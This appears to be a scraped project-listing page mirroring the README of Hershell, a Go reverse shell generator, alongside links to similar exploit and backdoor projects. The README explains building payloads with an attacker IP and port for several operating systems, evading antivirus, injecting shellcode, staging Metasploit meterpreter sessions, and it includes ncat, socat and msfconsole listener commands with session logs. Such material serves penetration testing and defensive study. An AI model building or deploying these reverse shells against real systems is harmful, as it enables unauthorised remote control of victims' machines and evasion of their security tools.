GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → lesnuages → Hershell

lesnuages / Hershell

Licence: bsd-3-clause
Multiplatform reverse shell generator

Programming Languages

go
31211 projects - #10 most used programming language

Labels

securityexploitreverse-shell

Projects that are alternatives of or similar to Hershell

Thoron
Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.
Stars: ✭ 87 (-80.92%)
Mutual labels:  exploit, reverse-shell
Androrat
A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side
Stars: ✭ 187 (-58.99%)
Mutual labels:  exploit, reverse-shell
Reverse Shell
Reverse Shell as a Service
Stars: ✭ 1,281 (+180.92%)
Mutual labels:  exploit, reverse-shell
rsGen
rsGen is a Reverse Shell Payload Generator for hacking.
Stars: ✭ 71 (-84.43%)
Mutual labels:  reverse-shell, exploit
Jexboss
JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
Stars: ✭ 2,008 (+340.35%)
Mutual labels:  exploit, reverse-shell
YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (-92.32%)
Mutual labels:  reverse-shell, exploit
Struts Pwn
An exploit for Apache Struts CVE-2017-5638
Stars: ✭ 391 (-14.25%)
Mutual labels:  exploit
Cloak
Cloak can backdoor any python script with some tricks.
Stars: ✭ 411 (-9.87%)
Mutual labels:  exploit
A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (-16.23%)
Mutual labels:  exploit
Trinity
Trinity Exploit - Emulator Escape
Stars: ✭ 371 (-18.64%)
Mutual labels:  exploit
Hershell
Hershell is a simple TCP reverse shell written in Go.
Stars: ✭ 442 (-3.07%)
Mutual labels:  reverse-shell
Covertutils
A framework for Backdoor development!
Stars: ✭ 424 (-7.02%)
Mutual labels:  reverse-shell
Firmware slap
Discovering vulnerabilities in firmware through concolic analysis and function clustering.
Stars: ✭ 407 (-10.75%)
Mutual labels:  exploit
Php imap open exploit
Bypassing disabled exec functions in PHP (c) CRLF
Stars: ✭ 392 (-14.04%)
Mutual labels:  exploit
Torat
ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication
Stars: ✭ 415 (-8.99%)
Mutual labels:  reverse-shell
Hyperpwn
A hyper plugin to provide a flexible GDB GUI with the help of GEF, pwndbg or peda
Stars: ✭ 387 (-15.13%)
Mutual labels:  exploit
Cve 2017 0785
Blueborne CVE-2017-0785 Android information leak vulnerability
Stars: ✭ 428 (-6.14%)
Mutual labels:  exploit
Ladongo
Ladon Pentest Scanner framework 全平台LadonGo开源内网渗透扫描器框架,使用它可轻松一键批量探测C段、B段、A段存活主机、高危漏洞检测MS17010、SmbGhost,远程执行SSH/Winrm,密码爆破SMB/SSH/FTP/Mysql/Mssql/Oracle/Winrm/HttpBasic/Redis,端口扫描服务识别PortScan指纹识别/HttpBanner/HttpTitle/TcpBanner/Weblogic/Oxid多网卡主机,端口扫描服务识别PortScan。
Stars: ✭ 366 (-19.74%)
Mutual labels:  exploit
Meltdown
This repository contains several applications, demonstrating the Meltdown bug.
Stars: ✭ 3,931 (+762.06%)
Mutual labels:  exploit
Nxloader
My first Android app: Launch Fusée Gelée payloads from stock Android (CVE-2018-6242)
Stars: ✭ 417 (-8.55%)
Mutual labels:  exploit
View All Similar Projects ➔

Hershell

Simple TCP reverse shell written in Go.

It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.

Supported OS are:

  • Windows
  • Linux
  • Mac OS
  • FreeBSD and derivatives

Why ?

Although meterpreter payloads are great, they are sometimes spotted by AV products.

The goal of this project is to get a simple reverse shell, which can work on multiple systems.

How ?

Since it's written in Go, you can cross compile the source for the desired architecture.

Getting started & dependencies

As this is a Go project, you will need to follow the official documentation to set up your Golang environment (with the $GOPATH environment variable).

Then, just run go get github.com/lesnuages/hershell to fetch the project.

Building the payload

To simplify things, you can use the provided Makefile. You can set the following environment variables:

  • GOOS : the target OS
  • GOARCH : the target architecture
  • LHOST : the attacker IP or domain name
  • LPORT : the listener port

For the GOOS and GOARCH variables, you can get the allowed values here.

However, some helper targets are available in the Makefile:

  • depends : generate the server certificate (required for the reverse shell)
  • windows32 : builds a windows 32 bits executable (PE 32 bits)
  • windows64 : builds a windows 64 bits executable (PE 64 bits)
  • linux32 : builds a linux 32 bits executable (ELF 32 bits)
  • linux64 : builds a linux 64 bits executable (ELF 64 bits)
  • macos32 : builds a mac os 32 bits executable (Mach-O)
  • macos64 : builds a mac os 64 bits executable (Mach-O)

For those targets, you just need to set the LHOST and LPORT environment variables.

Using the shell

Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.

The following special commands are supported:

  • run_shell : drops you an system shell (allowing you, for example, to change directories)
  • inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it
  • meterpreter [tcp|http|https] IP:PORT : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
  • exit : exit gracefully

Usage

First of all, you will need to generate a valid certificate:

$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem

For windows:

# Predifined 32 bit target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
# Predifined 64 bit target
$ make windows64 LHOST=192.168.0.12 LPORT=1234

For Linux:

# Predifined 32 bit target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
# Predifined 64 bit target
$ make linux64 LHOST=192.168.0.12 LPORT=1234

For Mac OS X

$ make macos LHOST=192.168.0.12 LPORT=1234

Examples

Basic usage

One can use various tools to handle incomming connections, such as:

  • socat
  • ncat
  • openssl server module
  • metasploit multi handler (with a python/shell_reverse_tcp_ssl payload)

Here is an example with ncat:

$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab

Here is an example with socat (tested with version 1.7.3.2):

$ socat `tty` OPENSSL-LISTEN:1234,reuseaddr,cert=server.pem,key=server.key,verify=0
# connection would be initiated here
[hershell]> whoami
desktop-3pvv31a\lab

Meterpreter staging

WARNING: this currently only work for the Windows platform.

The meterpreter staging currently supports the following payloads :

  • windows/meterpreter/reverse_tcp
  • windows/x64/meterpreter/reverse_tcp
  • windows/meterpreter/reverse_http
  • windows/x64/meterpreter/reverse_http
  • windows/meterpreter/reverse_https
  • windows/x64/meterpreter/reverse_https

To use the correct one, just specify the transport you want to use (tcp, http, https)

To use the meterpreter staging feature, just start your handler:

[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >

Then, in hershell, use the meterpreter command:

[hershell]> meterpreter https 172.16.122.105:8443

A new meterpreter session should pop in msfconsole:

[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100

[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A  172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)

[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PVV31A\lab

Credits

@khast3x for the Dockerfile feature

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].